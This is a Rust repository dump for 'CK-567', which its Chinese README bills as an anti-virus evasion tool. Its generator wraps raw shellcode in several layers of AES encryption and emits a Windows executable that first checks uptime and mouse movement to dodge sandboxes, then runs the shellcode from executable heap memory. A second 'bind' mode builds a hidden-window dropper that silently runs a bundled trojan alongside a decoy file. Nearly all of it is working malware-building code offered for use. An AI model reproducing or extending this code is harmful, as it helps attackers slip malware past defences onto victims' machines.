├── Cargo.toml ├── README.md ├── build.rs ├── ck.ico ├── doc └── ck.jpg ├── src ├── core │ ├── loader.rs │ └── mod.rs ├── main.rs └── utils.rs └── temp ├── shellcode ├── Cargo.toml ├── build.rs └── main.rs └── sleeve ├── Cargo.toml ├── build.rs └── main.rs /Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "CK-567" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [build-dependencies] 9 | winres = "0.1" 10 | [dependencies] 11 | aes = "0.8" 12 | ctr = "0.9" 13 | cipher = {version = "0.4.3", features=["block-padding"]} 14 | clap = "4.3.0" 15 | hex = "0.4.2" 16 | rust-embed="6.4.0" 17 | libaes = "*" 18 | rand = "*" 19 | base64 = "0.21.2" 20 | serde_json = "1.0" 21 | serde = { version = "1.0", features = ["derive"] } 22 | winapi = { version = "0.3.9",features = ["libloaderapi","minwinbase","rpc","winnls","heapapi","winuser", "winnt", "memoryapi","sysinfoapi"]} 23 | 24 | 25 | [profile.release] 26 | opt-level = "z" # 使用最高级别的优化 27 | lto = true # 启用链接时优化 28 | codegen-units = 1 # 设置为1以降低编译时间 29 | panic = 'abort' # 使用 "abort" 模式来处理 panic 30 | strip = "symbols" # 剥离所有符号,包括调试符号和未使用的符号 31 | overflow-checks = false # 禁用溢出检查 -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |
2 |

CK-567

3 |

CK-567 强大的Anti-Virus对抗工具

4 |
5 |
6 | 7 |
8 | 9 | ### 由遮天 项目组指导 10 | 11 | shellcode **格式** 12 | 13 | - **raw** 14 | ### 环境 15 | 16 | **安装Rust** 17 | 18 | rust环境[https://www.rust-lang.org/learn/get-started] 19 | 20 | **C++环境** 21 | 22 | 23 | build exe需要
24 | **方案一:VisualStudio** 25 | 26 | 先安装VisualStudio
27 | https://visualstudio.microsoft.com/zh-hans/visual-cpp-build-tools/
28 | 执行下面命令(如果有VS则直接执行)
29 | ``` 30 | rustup default nightly 31 | ``` 32 | 缺点 占用磁盘空间大,可以看下面方案
33 | 34 | **方案二:MinGW**
35 | 36 | 先安装mingw
37 | https://osdn.net/projects/mingw/downloads/68260/mingw-get-setup.exe/
38 | 执行下面命令(如果有MinGW则直接执行)
39 | ``` 40 | x84 64位 41 | rustup toolchain install nightly-x86_64-pc-windows-gnu 42 | rustup default nightly-x86_64-pc-windows-gnu 43 | ``` 44 | 45 | 46 | ### 使用 47 | 48 | ``` 49 | 50 | ▄████▄ ██ ▄█▀ 51 | ▒██▀ ▀█ ██▄█▒ 52 | ▒▓█ ▄ ▓███▄░ 53 | ▒▓▓▄ ▄██▒▓██ █▄ 54 | ▒ ▓███▀ ░▒██▒ █▄ 55 | ░ ░▒ ▒ ░▒ ▒▒ ▓▒ 56 | ░ ▒ ░ ░▒ ▒░ 57 | ░ ░ ░░ ░ 58 | ░ ░ ░ ░ 59 | ░ 60 | 61 | version:0.3 62 | ``` 63 | 64 | 65 | **加载器:** 66 | 67 | ``` 68 | ▄████▄ ██ ▄█▀ 69 | ▒██▀ ▀█ ██▄█▒ 70 | ▒▓█ ▄ ▓███▄░ 71 | ▒▓▓▄ ▄██▒▓██ █▄ 72 | ▒ ▓███▀ ░▒██▒ █▄ 73 | ░ ░▒ ▒ ░▒ ▒▒ ▓▒ 74 | ░ ▒ ░ ░▒ ▒░ 75 | ░ ░ ░░ ░ 76 | ░ ░ ░ ░ 77 | ░ 78 | 79 | version:0.3 80 | shellcode 加载器 81 | 82 | Usage: CK-567.exe shellcode [OPTIONS] -f -n 83 | 84 | Options: 85 | -f shellcode 路径 86 | -n 生成的exe 名称 87 | -i exe ico 88 | -t 反沙盒:计算机运⾏时间 默认3600s 单位:秒 如果当前计算机小于 该参数则不执行。 op-time<0则 不检测 89 | -m 反沙盒: 鼠标移动检测 默认true 如果当前计算机 鼠标没有移动过则不执行 (true/false) 90 | -h, --help Print help 91 | ``` 92 | 93 | ``` 94 | CK-567.exe shellcode -f=C:\Users\10431\Desktop\payload.bin -n=a10 -t=-1 -m=false 95 | ``` 96 | 97 | **捆绑木马:** 98 | 99 | ``` 100 | 101 | ▄████▄ ██ ▄█▀ 102 | ▒██▀ ▀█ ██▄█▒ 103 | ▒▓█ ▄ ▓███▄░ 104 | ▒▓▓▄ ▄██▒▓██ █▄ 105 | ▒ ▓███▀ ░▒██▒ █▄ 106 | ░ ░▒ ▒ ░▒ ▒▒ ▓▒ 107 | ░ ▒ ░ ░▒ ▒░ 108 | ░ ░ ░░ ░ 109 | ░ ░ ░ ░ 110 | ░ 111 | 112 | version:0.1 113 | error: the following required arguments were not provided: 114 | -f 115 | -i 116 | -t 117 | 118 | Usage: CK-567.exe bind -f -i -t 119 | 120 | For more information, try '--help'. 121 | 122 | ``` 123 | -------------------------------------------------------------------------------- /build.rs: -------------------------------------------------------------------------------- 1 | extern crate winres; 2 | 3 | 4 | fn main() { 5 | if cfg!(target_os = "windows") { 6 | let mut res = winres::WindowsResource::new(); 7 | res.set_icon("ck.ico"); 8 | res.compile().unwrap(); 9 | } 10 | } -------------------------------------------------------------------------------- /ck.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TheBlindM/CK-567/28143c73f16d795e0ac9b20c37efdba0853e7e53/ck.ico -------------------------------------------------------------------------------- /doc/ck.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TheBlindM/CK-567/28143c73f16d795e0ac9b20c37efdba0853e7e53/doc/ck.jpg -------------------------------------------------------------------------------- /src/core/loader.rs: -------------------------------------------------------------------------------- 1 | use std::collections::HashMap; 2 | use std::fs::{create_dir_all, read, remove_dir_all, write}; 3 | use std::iter::Map; 4 | use std::path::Path; 5 | use std::process::{Command, Stdio}; 6 | use std::ptr::null; 7 | 8 | use aes::Aes256; 9 | use rand::{Rng, thread_rng}; 10 | use rust_embed::RustEmbed; 11 | use serde::{Deserialize, Serialize}; 12 | 13 | use crate::utils; 14 | use crate::utils::aesEncrypt; 15 | 16 | pub trait Loader { 17 | fn load(&self); 18 | } 19 | 20 | 21 | #[derive(RustEmbed)] 22 | #[folder = "temp"] 23 | struct temFile; 24 | 25 | const key_placeholder: &str = "${key}"; 26 | const iv_placeholder: &str = "${iv}"; 27 | const base64Str_placeholder: &str = "${base64Str}"; 28 | const package_placeholder: &str = "${packageName}"; 29 | const hexCode_placeholder: &str = "${hexCode}"; 30 | const tick_count_placeholder: &str = "${tick_count}"; 31 | const mouse_movement_detection_placeholder: &str = "${mouse_movement_detection}"; 32 | 33 | #[derive(Serialize, Deserialize)] 34 | pub struct ScInfo { 35 | base64_str: String, 36 | kv: Vec<(String, String)>, 37 | } 38 | 39 | 40 | impl Loader for ShellCodeHandler { 41 | fn load(&self) { 42 | println!("shellcode 处理中。。。"); 43 | let shellcode = match read(&self.file_path) { 44 | Ok(res) => res, 45 | Err(err) => { 46 | println!("{}", err); 47 | std::process::exit(1); 48 | } 49 | }; 50 | 51 | let mainFile = temFile::get("shellcode/main.rs").unwrap(); 52 | let cargoToml = temFile::get("shellcode/Cargo.toml").unwrap(); 53 | let buildRs = temFile::get("shellcode/build.rs").unwrap(); 54 | let mainFile_str = std::str::from_utf8(mainFile.data.as_ref()).unwrap(); 55 | let cargoToml_str = std::str::from_utf8(cargoToml.data.as_ref()).unwrap(); 56 | let buildRs_str = std::str::from_utf8(buildRs.data.as_ref()).unwrap(); 57 | let mut tem_str: Vec = shellcode; 58 | let mut vec = Vec::new(); 59 | let mut rng = thread_rng(); 60 | let loop_count = rng.gen_range(3..8); 61 | for i in 0..loop_count { 62 | let (key, iv, ciphertext) = aesEncrypt(&tem_str); 63 | tem_str = ciphertext; 64 | vec.push((key, iv)) 65 | } 66 | 67 | 68 | let base64_str = base64::encode(&tem_str); 69 | let info = ScInfo { base64_str, kv: vec }; 70 | let json_str = serde_json::to_string(&info).unwrap(); 71 | 72 | // let mainFile_str = &mainFile_str.replace(&iv_placeholder, &iv); 73 | // let mainFile_str = &mainFile_str.replace(&key_placeholder, &key); 74 | let tem=&self.op_time*1000; 75 | let mainFile_str = &mainFile_str.replace(&hexCode_placeholder, &hex::encode(&json_str)); 76 | let mainFile_str = &mainFile_str.replace(&tick_count_placeholder, tem.to_string().as_str()); 77 | let mainFile_str = &mainFile_str.replace(&mouse_movement_detection_placeholder, &self.mouse_movement_detection.to_string().as_str()); 78 | let cargoToml_str = &cargoToml_str.replace(&package_placeholder, &self.package_name); 79 | 80 | 81 | if Some(&self.ico).is_some() & !&self.ico.is_empty() { 82 | println!("ico:{}", self.ico); 83 | let ico = read(&self.ico).unwrap(); 84 | let _ = write(format!("loader/ck.ico"), ico); 85 | } 86 | 87 | let _ = create_dir_all("loader/src"); 88 | let _ = create_dir_all("loader/.cargo"); 89 | let _ = write(format!("loader/src/main.rs"), mainFile_str); 90 | let _ = write(format!("loader/Cargo.toml"), cargoToml_str); 91 | let _ = write(format!("loader/build.rs"), buildRs_str); 92 | complie(); 93 | } 94 | } 95 | 96 | impl Loader for BindHandler { 97 | fn load(&self) { 98 | println!("捆绑文件中。。。"); 99 | let path = Path::new(&self.file_path); 100 | let file_name = path.file_name().unwrap().to_str().unwrap(); 101 | let file_stem_name = path.file_stem().unwrap().to_str().unwrap(); 102 | 103 | let mainFile = temFile::get("sleeve/main.rs").unwrap(); 104 | let cargoToml = temFile::get("sleeve/Cargo.toml").unwrap(); 105 | let buildRs = temFile::get("sleeve/build.rs").unwrap(); 106 | let mainFile_str = std::str::from_utf8(mainFile.data.as_ref()).unwrap(); 107 | let buildRs_str = std::str::from_utf8(buildRs.data.as_ref()).unwrap(); 108 | let cargoToml_str = std::str::from_utf8(cargoToml.data.as_ref()).unwrap(); 109 | 110 | 111 | let cargoToml_str = &cargoToml_str.replace(&package_placeholder, file_stem_name); 112 | 113 | if Some(&self.ico).is_some() & !&self.ico.is_empty() { 114 | println!("ico:{}", self.ico); 115 | let ico = read(&self.ico).unwrap(); 116 | let _ = write(format!("loader/ck.ico"), ico); 117 | } 118 | 119 | let _ = create_dir_all("loader/src"); 120 | let _ = create_dir_all("loader/tep"); 121 | let _ = create_dir_all("loader/.cargo"); 122 | let _ = write(format!("loader/src/main.rs"), mainFile_str); 123 | let _ = write(format!("loader/build.rs"), buildRs_str); 124 | let _ = write(format!("loader/Cargo.toml"), cargoToml_str); 125 | 126 | println!("copying file...."); 127 | 128 | let file = read(self.file_path.clone()).expect(&format!("文件读取失败:{}", &self.file_path)); 129 | 130 | let _ = write(format!("loader/tep/{}", file_name), file); 131 | 132 | //木马文件 133 | println!("{}", &self.trojan_file_path); 134 | let trojan_file = read(&self.trojan_file_path).expect(&format!("文件读取失败:{}", &self.trojan_file_path)); 135 | let _ = write(format!("loader/tep/{}.exe", file_stem_name), trojan_file); 136 | 137 | //complie(); 138 | } 139 | } 140 | 141 | pub fn complie() { 142 | println!("开始编译..."); 143 | let mut cmd = Command::new("cmd") 144 | .arg("/c") 145 | .arg("cd loader && cargo build -Z unstable-options --out-dir ../ --release") 146 | .spawn() 147 | .expect("编译失败!"); 148 | 149 | let status = cmd.wait(); 150 | let _ = remove_dir_all("loader"); 151 | } 152 | 153 | 154 | pub struct ShellCodeHandler { 155 | pub(crate) file_path: String, 156 | pub(crate) package_name: String, 157 | pub(crate) ico: String, 158 | pub(crate) op_time: i64, 159 | pub(crate) mouse_movement_detection: bool, 160 | } 161 | 162 | pub struct BindHandler { 163 | pub(crate) file_path: String, 164 | pub(crate) trojan_file_path: String, 165 | pub(crate) ico: String, 166 | } 167 | 168 | -------------------------------------------------------------------------------- /src/core/mod.rs: -------------------------------------------------------------------------------- 1 | pub mod loader; -------------------------------------------------------------------------------- /src/main.rs: -------------------------------------------------------------------------------- 1 | use std::borrow::Borrow; 2 | use std::ptr::null; 3 | 4 | use aes::{Aes128, Aes128Dec, Aes128Enc}; 5 | use aes::cipher::{ 6 | BlockCipher, BlockDecrypt, BlockEncrypt, generic_array::GenericArray, 7 | KeyInit, 8 | }; 9 | use aes::cipher::{BlockDecryptMut, BlockEncryptMut}; 10 | use aes::cipher::block_padding::Pkcs7; 11 | use clap::{Arg, Command}; 12 | use hex; 13 | use winapi::um::memoryapi::{VirtualAlloc, VirtualProtect}; 14 | use winapi::um::sysinfoapi::GetTickCount; 15 | use winapi::um::winnt::{MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE}; 16 | use winapi::um::winuser::{GetCursorPos, GetLastInputInfo, LASTINPUTINFO, MOUSEMOVEPOINT}; 17 | 18 | use crate::core::loader::{BindHandler, Loader, ShellCodeHandler}; 19 | 20 | pub mod utils; 21 | pub mod core; 22 | 23 | 24 | fn main() { 25 | println!(" 26 | ▄████▄ ██ ▄█▀ 27 | ▒██▀ ▀█ ██▄█▒ 28 | ▒▓█ ▄ ▓███▄░ 29 | ▒▓▓▄ ▄██▒▓██ █▄ 30 | ▒ ▓███▀ ░▒██▒ █▄ 31 | ░ ░▒ ▒ ░▒ ▒▒ ▓▒ 32 | ░ ▒ ░ ░▒ ▒░ 33 | ░ ░ ░░ ░ 34 | ░ ░ ░ ░ 35 | ░ 36 | "); 37 | println!("version:0.3"); 38 | 39 | let matches = Command::new("ck567") 40 | .subcommands([ 41 | Command::new("bind") 42 | .about("捆绑exe") 43 | .arg( 44 | Arg::new("file") 45 | .short('f') 46 | .help("exe 路径") 47 | .required(true) 48 | ).arg( 49 | Arg::new("ico") 50 | .short('i') 51 | .help("ico") 52 | .required(true) 53 | ).arg(Arg::new("trojan") 54 | .short('t') 55 | .required(true) 56 | .help("木马文件路径")), 57 | Command::new("shellcode") 58 | .about("shellcode 加载器") 59 | .arg( 60 | Arg::new("file") 61 | .short('f') 62 | .help("shellcode 路径") 63 | .required(true), 64 | ) 65 | .arg(Arg::new("name").short('n').required(true).help("生成的exe 名称")) 66 | .arg( 67 | Arg::new("ico") 68 | .short('i') 69 | .help("exe ico") 70 | .required(false) 71 | ).arg( 72 | Arg::new("opTime") 73 | .short('t') 74 | .help("反沙盒:计算机运⾏时间 默认3600s 单位:秒 如果当前计算机小于 该参数则不执行。 op-time<0则 不检测") 75 | .required(false) 76 | ).arg( 77 | Arg::new("mouseMovementDetection") 78 | .short('m') 79 | .help("反沙盒:鼠标移动检测 默认true 如果当前计算机 鼠标没有移动过则不执行 (true/false)") 80 | .required(false) 81 | ) 82 | ] 83 | ) 84 | .get_matches(); 85 | 86 | if let Some(sub_m) = matches.subcommand_matches("shellcode") { 87 | let fp = sub_m.get_one::("file").unwrap().clone(); 88 | let name = sub_m.get_one::("name").unwrap().clone(); 89 | let ico; 90 | if let Some(value) = sub_m.get_one::("ico") { 91 | ico = sub_m.get_one::("ico").unwrap().clone(); 92 | } else { 93 | ico = String::new(); 94 | } 95 | let string = String::from("3600"); 96 | let op_time = sub_m.get_one::("opTime").or_else(||Some(&string)).unwrap().clone(); 97 | let string = String::from("true"); 98 | let mouse_movement_detection = sub_m.get_one::("mouseMovementDetection").or_else(||Some(&string)).unwrap().clone(); 99 | 100 | let shell_code_loader = ShellCodeHandler { file_path: fp, package_name: name, ico, op_time:op_time.clone().parse().unwrap(), mouse_movement_detection:mouse_movement_detection.parse().unwrap() }; 101 | shell_code_loader.load(); 102 | } else if let Some(sub_m_1) = matches.subcommand_matches("bundle") { 103 | let fp = sub_m_1.get_one::("file").unwrap().clone(); 104 | let trojan = sub_m_1.get_one::("trojan").unwrap().clone(); 105 | let ico; 106 | if let Some(value) = sub_m_1.get_one::("ico") { 107 | ico = sub_m_1.get_one::("ico").unwrap().clone(); 108 | } else { 109 | ico = String::new(); 110 | } 111 | 112 | let bind_handler = BindHandler { file_path: fp, trojan_file_path: trojan, ico }; 113 | bind_handler.load(); 114 | } 115 | } 116 | -------------------------------------------------------------------------------- /src/utils.rs: -------------------------------------------------------------------------------- 1 | #![feature(array_chunks)] 2 | 3 | use std::borrow::Borrow; 4 | 5 | use aes::{Aes128, Aes128Dec, Aes128Enc}; 6 | use aes::cipher::{ 7 | BlockCipher, BlockDecrypt, BlockEncrypt, generic_array::GenericArray, 8 | KeyInit, 9 | }; 10 | use aes::cipher::{BlockDecryptMut, BlockEncryptMut}; 11 | use aes::cipher::block_padding::Pkcs7; 12 | use libaes::Cipher; 13 | use rand::Rng; 14 | 15 | pub const RANDOM_AES_KEY: &[u8] = b"abcdefghijklmnopqrstuvwxyz"; 16 | 17 | 18 | pub fn aesEncrypt(plaintext: &Vec) -> (String,String, Vec) { 19 | let mut rng = rand::thread_rng(); 20 | let key: String = (0..16) 21 | .map(|_| unsafe { 22 | let idx = rng.gen_range(0..RANDOM_AES_KEY.len()); 23 | char::from(RANDOM_AES_KEY.get_unchecked(idx).to_owned() ) 24 | }).collect(); 25 | 26 | let iv: String = (0..16) 27 | .map(|_| unsafe { 28 | let idx = rng.gen_range(0..RANDOM_AES_KEY.len()); 29 | char::from(RANDOM_AES_KEY.get_unchecked(idx).to_owned() ) 30 | }).collect(); 31 | 32 | let cipher = Cipher::new_128(key.as_bytes()[0..16].try_into().unwrap()); 33 | return (key, iv.clone(),cipher.cbc_encrypt(iv.clone().as_ref(), plaintext)); 34 | } 35 | 36 | pub fn aesDecrypt(key: String, iv: String, ciphertext: String) -> Vec { 37 | let cipher = Cipher::new_128(&key.as_bytes()[0..16].try_into().unwrap()); 38 | cipher.cbc_decrypt(iv.as_bytes(), ciphertext.as_bytes()) 39 | } 40 | 41 | -------------------------------------------------------------------------------- /temp/shellcode/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "${packageName}" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | [build-dependencies] 8 | winres = "0.1" 9 | 10 | [profile.release] 11 | opt-level = "z" # 使用最高级别的优化 12 | codegen-units = 1 # 设置为1以降低编译时间 13 | panic = 'abort' # 使用 "abort" 模式来处理 panic 14 | overflow-checks = false # 禁用溢出检查 15 | 16 | [dependencies] 17 | obfstr="0.4.3" 18 | aes = "0.8.1" 19 | hex = "0.4.2" 20 | libaes = "*" 21 | rand = "*" 22 | base64 = "0.21.2" 23 | serde_json = "1.0" 24 | serde = { version = "1.0", features = ["derive"] } 25 | winapi = { version = "0.3.9",features = ["fibersapi","processthreadsapi","libloaderapi","minwinbase","rpc","winnls","heapapi","winuser", "winnt", "memoryapi","winbase","sysinfoapi"]} 26 | 27 | -------------------------------------------------------------------------------- /temp/shellcode/build.rs: -------------------------------------------------------------------------------- 1 | extern crate winres; 2 | 3 | use std::path::Path; 4 | 5 | 6 | fn main() { 7 | if cfg!(target_os = "windows") { 8 | let file_path = Path::new("ck.ico"); 9 | if file_path.exists() { 10 | let mut res = winres::WindowsResource::new(); 11 | res.set_icon("ck.ico"); 12 | res.compile().unwrap(); 13 | } 14 | } 15 | } -------------------------------------------------------------------------------- /temp/shellcode/main.rs: -------------------------------------------------------------------------------- 1 | #![windows_subsystem = "windows"] 2 | extern crate alloc; 3 | 4 | use alloc::ffi::CString; 5 | use std::{mem, thread}; 6 | use std::arch::asm; 7 | use std::mem::transmute; 8 | use std::ptr::{null, null_mut}; 9 | use std::time::Duration; 10 | 11 | use hex; 12 | use libaes::Cipher; 13 | use obfstr::obfstr as s; 14 | use rand::Rng; 15 | use winapi::um::heapapi::{HeapAlloc, HeapCreate}; 16 | use winapi::um::libloaderapi::{GetModuleHandleA, GetProcAddress}; 17 | use winapi::um::sysinfoapi::GetTickCount; 18 | use winapi::um::winnt::{HEAP_CREATE_ENABLE_EXECUTE, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE, PAGE_READONLY}; 19 | use winapi::um::winuser::{GetCursorPos, GetLastInputInfo, LASTINPUTINFO, MOUSEMOVEPOINT}; 20 | use serde::{Deserialize, Serialize}; 21 | 22 | #[derive(Serialize, Deserialize)] 23 | pub struct ScInfo{ 24 | base64_str:String, 25 | kv:Vec<(String,String)> 26 | } 27 | 28 | fn main() { 29 | unsafe { 30 | if !analy_environment() { 31 | thread::sleep(Duration::from_secs(10)); 32 | return; 33 | } 34 | } 35 | thread::sleep(Duration::from_secs(2)); 36 | //编译混淆 37 | let hexDecode = hex::decode(s!("${hexCode}")).expect("hex decode err"); 38 | let sc_info: ScInfo = serde_json::from_slice(hexDecode.as_slice()).unwrap(); 39 | let string = sc_info.base64_str; 40 | let map = sc_info.kv; 41 | let pairs = map.iter().rev(); 42 | let mut aesShellCode = base64::decode(string).unwrap(); 43 | for (key, value) in pairs { 44 | aesShellCode = aesDecrypt(&key, &value, aesShellCode); 45 | } 46 | 47 | 48 | thread::sleep(Duration::from_secs(1)); 49 | let shellCode = &aesShellCode; 50 | 51 | let flen = shellCode.len(); 52 | 53 | thread::sleep(Duration::from_secs(1)); 54 | unsafe { 55 | let heap= HeapCreate(HEAP_CREATE_ENABLE_EXECUTE,0,0); 56 | let alloc = HeapAlloc(heap, 8, flen); 57 | std::ptr::copy_nonoverlapping(shellCode.as_ptr(), alloc as *mut u8, flen); 58 | 59 | let heap1= HeapCreate(HEAP_CREATE_ENABLE_EXECUTE,0,0); 60 | let alloc1 = HeapAlloc(heap1, 8, flen); 61 | std::ptr::copy_nonoverlapping(alloc as *mut u8, alloc1 as *mut u8, flen); 62 | 63 | 64 | let jmp_target = alloc1.offset(0 as isize); 65 | asm!("jmp {}", in(reg) jmp_target) 66 | } 67 | } 68 | 69 | pub fn aesDecrypt(key: &String, iv: &String, ciphertext: Vec) -> Vec { 70 | let cipher = Cipher::new_128(key.as_bytes()[0..16].try_into().unwrap()); 71 | cipher.cbc_decrypt(iv.as_bytes(), &ciphertext) 72 | } 73 | 74 | pub unsafe fn analy_environment() -> bool { 75 | let tick_count = GetTickCount(); 76 | let v1= ${tick_count}; 77 | if i64::from(tick_count) <= v1 && v1>0 { 78 | println!("开机时间过短"); 79 | return false; 80 | } 81 | println!("系统启动以来的毫秒数: {}", tick_count); 82 | let mut last_input_info: LASTINPUTINFO = LASTINPUTINFO { 83 | cbSize: mem::size_of::() as u32, 84 | dwTime: 0, 85 | }; 86 | last_input_info.cbSize = mem::size_of::() as u32; 87 | let v2= ${mouse_movement_detection}; 88 | if !v2 { 89 | return true; 90 | } 91 | 92 | if GetLastInputInfo(&mut last_input_info as *mut LASTINPUTINFO) != 0 { 93 | let last_input_time = last_input_info.dwTime; 94 | let system_uptime = GetTickCount(); 95 | if system_uptime - last_input_time > 0 { 96 | println!("鼠标从开机后移动过"); 97 | return true; 98 | } else { 99 | println!("鼠标从开机后未移动过"); 100 | return false; 101 | } 102 | } 103 | 104 | 105 | return false; 106 | } 107 | 108 | 109 | -------------------------------------------------------------------------------- /temp/sleeve/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "${packageName}" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [build-dependencies] 9 | winres = "0.1" 10 | 11 | [dependencies] 12 | libaes = "*" 13 | rust-embed="6.4.0" 14 | 15 | [profile.release] 16 | opt-level = "z" # 使用最高级别的优化 17 | lto = true # 启用链接时优化 18 | codegen-units = 1 # 设置为1以降低编译时间 19 | panic = 'abort' # 使用 "abort" 模式来处理 panic 20 | strip = "symbols" # 剥离所有符号,包括调试符号和未使用的符号 21 | overflow-checks = false # 禁用溢出检查 22 | -------------------------------------------------------------------------------- /temp/sleeve/build.rs: -------------------------------------------------------------------------------- 1 | extern crate winres; 2 | 3 | use std::path::Path; 4 | 5 | 6 | fn main() { 7 | if cfg!(target_os = "windows") { 8 | let file_path = Path::new("ck.ico"); 9 | if file_path.exists() { 10 | let mut res = winres::WindowsResource::new(); 11 | res.set_icon("ck.ico"); 12 | res.compile().unwrap(); 13 | } 14 | } 15 | } -------------------------------------------------------------------------------- /temp/sleeve/main.rs: -------------------------------------------------------------------------------- 1 | #![windows_subsystem = "windows"] 2 | 3 | use std::fs; 4 | use std::fs::write; 5 | use std::mem::transmute; 6 | use std::os::windows::process::CommandExt; 7 | use std::process::Command; 8 | use std::process::Stdio; 9 | use std::ptr::null; 10 | 11 | use rust_embed::RustEmbed; 12 | 13 | #[derive(RustEmbed)] 14 | #[folder = "tep"] 15 | struct Asset; 16 | 17 | 18 | #[macro_use] 19 | macro_rules! run_cmd { 20 | ($cmd:expr) => { 21 | Command::new("cmd") 22 | .creation_flags(0x08000000) 23 | .args(&["/c", $cmd]) 24 | .stdout(Stdio::piped()) 25 | .spawn(); 26 | }; 27 | } 28 | 29 | fn main() { 30 | for i in Asset::iter() { 31 | let path = i.as_ref(); 32 | let file = Asset::get(path).unwrap(); 33 | let name = i.as_ref().to_string(); 34 | if i.as_ref().to_string().contains("exe") { 35 | let user_dir = std::env::var("USERPROFILE").expect("无法获取用户目录"); 36 | println!("{}", user_dir); 37 | let exe_path = format!("{}\\{}", user_dir, name); 38 | let _ = write(&exe_path, file.data); 39 | run_cmd!(&exe_path); 40 | } else { 41 | let _ = write(format!("{}", name), file.data); 42 | run_cmd!(&name); 43 | let name: Vec<&str> = path.split(".").collect(); 44 | run_cmd!(format!("del {}.exe",name[0]).as_str()); 45 | } 46 | } 47 | } 48 | 49 | 50 | 51 | --------------------------------------------------------------------------------